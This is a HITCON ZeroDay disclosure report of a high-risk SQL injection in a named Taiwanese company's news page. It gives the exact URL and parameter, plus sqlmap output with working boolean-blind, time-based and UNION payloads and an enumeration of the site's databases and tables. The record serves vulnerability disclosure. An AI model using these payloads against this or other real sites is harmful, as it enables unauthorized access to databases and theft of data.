Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-00419
- Vendor: 泛源股份有限公司
- Title: 泛源股份有限公司SQL
- Introduction: 泛源股份有限公司SQL
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2018/04/07 20:55:43 : 新提交 (由 Cra5h 更新此狀態)
- 2018/04/08 00:10:44 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/08 02:15:26 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/04/08 02:15:27 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/06/07 03:00:25 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2018-00419
- 通報者:cra5h (Cra5h)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
敘述
泛源股份有限公司SQL
SQL位置:
http://www.zapak.com.tw/p2-news-detail.php?news_code=01&sn=28
sn参数过滤不严导致SQL产生
GET parameter 'sn' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 224 HTTP(s) requests:
Parameter: sn (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: news_code=01&sn=28 AND 1483=1483
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: news_code=01&sn=28 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: news_code=01&sn=-5073 UNION ALL SELECT NULL,CONCAT(0x71786a7171,0x66487765796a57444c52636571506f6471484b73706d636c42734c7649776a724f764977676a6166,0x7170766271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nFQd
[17:07:23] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
[17:07:23] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.zapak.com.tw'
确认影响库:(3库)
available databases [3]:
[] information_schema
[] test
[*] webadmin
[17:08:43] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.zapak.com.tw'
查看数据量:
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 217 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 124 |
| COLLATIONS | 124 |
| CHARACTER_SETS | 36 |
| TABLES | 23 |
| SCHEMA_PRIVILEGES | 9 |
| KEY_COLUMN_USAGE | 6 |
| STATISTICS | 6 |
| TABLE_CONSTRAINTS | 6 |
| SCHEMATA | 3 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
Database: webadmin
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| faq | 28 |
| parameter_sheet | 19 |
| news | 18 |
| code | 5 |
| sn_counter | 5 |
| code_type | 2 |
| manager | 1 |
+---------------------------------------+---------+
[17:14:03] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.zapak.com.tw'
修補建議
过滤,参数化